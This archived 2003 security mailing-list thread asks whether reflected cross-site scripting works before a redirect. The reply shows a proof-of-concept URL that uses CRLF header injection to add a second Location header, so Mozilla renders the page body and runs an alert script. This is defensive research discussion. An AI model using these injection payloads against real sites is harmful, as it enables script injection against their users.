WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

RE: CSS before redirect

From: "Thomas Schreiber" <ts () secure-net de>
Date: Tue, 9 Sep 2003 11:09:03 +0200
There is a security risk, under some circumstances: it exists a second
vulnerability and the client is Mozilla or Firebird (tested with latest
version). IE latest version and Opera do not seem vulnerable, others not
tested.

The additional hole needed often exists if the redirect is not done by the
webserver but by some custom script that does not correctly sanitize input.

Suppose you enter this:
http://somewhere.tld/here?search=";></a><script>alert('hello')</script><!--%0
d%0aLocation:%20foo://bar

If the custom redirector does not properly handle it, it may rewrite the
%0d%0a as it is, i.e. CRLF. Which results in this header:

HTTP/1.1 302 Object Moved
Location:
http://somewhereelse.com/there?search=";></a><script>alert('hello')</script><
!--
Location: foo://bar
Server: Microsoft-IIS/4.0
Content-Type: text/html

The mozilla browsers (perhaps others) overwrite the first 'Location:' by the
second. As this (foo://bar) is not a valid URL it takes the body as last
resort and the XSS-Code becomes evaluated.


Thomas Schreiber - ts () secure-net de
SecureNet GmbH, Munich


  > -----Original Message-----
  > From: Stephen de Vries [mailto:stephen.devries () dcode net]
  > Sent: Monday, September 08, 2003 5:33 PM
  > To: webappsec () securityfocus com
  > Subject: CSS before redirect
  >
  >
  >
  > Hi all,
  >
  > I'm looking at an application that seems to be vulnerable to CSS attack,
  > however, the browser keeps following the redirect before running the
  > script.  The request:
  >
  > GET /includes?"></a><script>alert('hello')</script> HTTP/1.1
  >
  > Results in the following response:
  >
  > HTTP/1.1 302 Object Moved
  > Location: https://somwhereelse.com
  > Server: Microsoft-IIS/4.0
  > Content-Type: text/html
  > Content-Length: 123
  >
  > <head><title>Document Moved</title></head>
  > <body><h1>Object Moved</h1>This document may be found <a
  > HREF="https://somewhereelse.com/includes/?";></a><script>alert('h
  > ello')</script>">here</a>
  >
  > The CSS injection looks as though it should work, if the browser just
  > displayed that page, but instead it acts on the redirect immediately
  > before displaying the page.  This happens in both Mozilla 1.4 and IE 6.
  > Do you think this represents a security risk ?  Do older browsers behave
  > in the same way ?  Is it possible to turn this behaviour off ?  Does
  > cologne make the man ?
  >
  >
  > cheers,
  >
  > Stephen
Previous By Date Next
Previous By Thread Next

Current thread: